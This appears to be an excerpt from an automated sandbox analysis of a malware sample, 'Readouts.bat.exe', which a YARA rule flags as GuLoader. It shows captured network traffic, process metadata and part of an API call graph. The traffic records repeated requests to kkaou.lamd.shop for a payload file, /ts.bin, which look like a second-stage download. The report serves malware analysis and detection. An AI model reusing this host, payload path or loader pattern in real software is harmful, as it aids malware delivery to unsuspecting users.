                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:17.208091021 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:17.594261885 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:03 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:17.708781004 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:18.094583988 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:03 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:18.207731009 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:18.593561888 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:04 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:18.707848072 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:19.093539000 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:04 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:19.207875967 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:19.593852997 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:05 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:19.711421967 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:20.108227015 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:05 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:20.223490000 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:20.613784075 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:06 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:20.723654985 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:21.109558105 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:06 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:21.223464966 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:21.609508038 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:07 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:11:21.723721981 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:11:22.109802961 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:11:07 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:01:09:14
                                              Start date:25/11/2024
                                              Path:C:\Users\user\Desktop\Readouts.bat.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Readouts.bat.exe"
                                              Imagebase:0x400000
                                              File size:993'977 bytes
                                              MD5 hash:492707A5E753B9C5FAA6A9829E065775
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1852688575.0000000005615000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:01:10:07
                                              Start date:25/11/2024
                                              Path:C:\Users\user\Desktop\Readouts.bat.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Readouts.bat.exe"
                                              Imagebase:0x400000
                                              File size:993'977 bytes
                                              MD5 hash:492707A5E753B9C5FAA6A9829E065775
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2593525924.0000000002115000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:18.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:20%
                                                Total number of Nodes:1574
                                                Total number of Limit Nodes:35
                                                execution_graph 4149 401941 4150 401943 4149->4150 4155 402c41 4150->4155 4156 402c4d 4155->4156 4201 4062a6 4156->4201 4159 401948 4161 405996 4159->4161 4243 405c61 4161->4243 4164 4059be DeleteFileW 4169 401951 4164->4169 4165 4059d5 4166 405b00 4165->4166 4257 406284 lstrcpynW 4165->4257 4166->4169 4286 4065c7 FindFirstFileW 4166->4286 4168 4059fb 4170 405a01 lstrcatW 4168->4170 4171 405a0e 4168->4171 4173 405a14 4170->4173 4258 405ba5 lstrlenW 4171->4258 4175 405a24 lstrcatW 4173->4175 4176 405a1a 4173->4176 4178 405a2f lstrlenW FindFirstFileW 4175->4178 4176->4175 4176->4178 4180 405af5 4178->4180 4199 405a51 4178->4199 4179 405b1e 4289 405b59 lstrlenW CharPrevW 4179->4289 4180->4166 4183 405ad8 FindNextFileW 4187 405aee FindClose 4183->4187 4183->4199 4184 40594e 5 API calls 4186 405b30 4184->4186 4188 405b34 4186->4188 4189 405b4a 4186->4189 4187->4180 4188->4169 4192 4052ec 24 API calls 4188->4192 4191 4052ec 24 API calls 4189->4191 4191->4169 4194 405b41 4192->4194 4193 405996 60 API calls 4193->4199 4196 40604a 36 API calls 4194->4196 4195 4052ec 24 API calls 4195->4183 4198 405b48 4196->4198 4198->4169 4199->4183 4199->4193 4199->4195 4262 406284 lstrcpynW 4199->4262 4263 40594e 4199->4263 4271 4052ec 4199->4271 4282 40604a MoveFileExW 4199->4282 4209 4062b3 4201->4209 4202 4064fe 4203 402c6e 4202->4203 4234 406284 lstrcpynW 4202->4234 4203->4159 4218 406518 4203->4218 4205 4064cc lstrlenW 4205->4209 4208 4062a6 10 API calls 4208->4205 4209->4202 4209->4205 4209->4208 4211 4063e1 GetSystemDirectoryW 4209->4211 4212 4063f4 GetWindowsDirectoryW 4209->4212 4213 406518 5 API calls 4209->4213 4214 4062a6 10 API calls 4209->4214 4215 40646f lstrcatW 4209->4215 4216 406428 SHGetSpecialFolderLocation 4209->4216 4227 406152 4209->4227 4232 4061cb wsprintfW 4209->4232 4233 406284 lstrcpynW 4209->4233 4211->4209 4212->4209 4213->4209 4214->4209 4215->4209 4216->4209 4217 406440 SHGetPathFromIDListW CoTaskMemFree 4216->4217 4217->4209 4225 406525 4218->4225 4219 4065a0 CharPrevW 4222 40659b 4219->4222 4220 40658e CharNextW 4220->4222 4220->4225 4222->4219 4223 4065c1 4222->4223 4223->4159 4224 40657a CharNextW 4224->4225 4225->4220 4225->4222 4225->4224 4226 406589 CharNextW 4225->4226 4239 405b86 4225->4239 4226->4220 4235 4060f1 4227->4235 4230 406186 RegQueryValueExW RegCloseKey 4231 4061b6 4230->4231 4231->4209 4232->4209 4233->4209 4234->4203 4236 406100 4235->4236 4237 406104 4236->4237 4238 406109 RegOpenKeyExW 4236->4238 4237->4230 4237->4231 4238->4237 4240 405b8c 4239->4240 4241 405ba2 4240->4241 4242 405b93 CharNextW 4240->4242 4241->4225 4242->4240 4292 406284 lstrcpynW 4243->4292 4245 405c72 4293 405c04 CharNextW CharNextW 4245->4293 4248 4059b6 4248->4164 4248->4165 4249 406518 5 API calls 4255 405c88 4249->4255 4250 405cb9 lstrlenW 4251 405cc4 4250->4251 4250->4255 4253 405b59 3 API calls 4251->4253 4252 4065c7 2 API calls 4252->4255 4254 405cc9 GetFileAttributesW 4253->4254 4254->4248 4255->4248 4255->4250 4255->4252 4256 405ba5 2 API calls 4255->4256 4256->4250 4257->4168 4259 405bb3 4258->4259 4260 405bc5 4259->4260 4261 405bb9 CharPrevW 4259->4261 4260->4173 4261->4259 4261->4260 4262->4199 4299 405d55 GetFileAttributesW 4263->4299 4266 40597b 4266->4199 4267 405971 DeleteFileW 4269 405977 4267->4269 4268 405969 RemoveDirectoryW 4268->4269 4269->4266 4270 405987 SetFileAttributesW 4269->4270 4270->4266 4272 405307 4271->4272 4281 4053a9 4271->4281 4273 405323 lstrlenW 4272->4273 4274 4062a6 17 API calls 4272->4274 4275 405331 lstrlenW 4273->4275 4276 40534c 4273->4276 4274->4273 4279 405343 lstrcatW 4275->4279 4275->4281 4277 405352 SetWindowTextW 4276->4277 4278 40535f 4276->4278 4277->4278 4280 405365 SendMessageW SendMessageW SendMessageW 4278->4280 4278->4281 4279->4276 4280->4281 4281->4199 4283 40606b 4282->4283 4284 40605e 4282->4284 4283->4199 4302 405ed0 4284->4302 4287 405b1a 4286->4287 4288 4065dd FindClose 4286->4288 4287->4169 4287->4179 4288->4287 4290 405b24 4289->4290 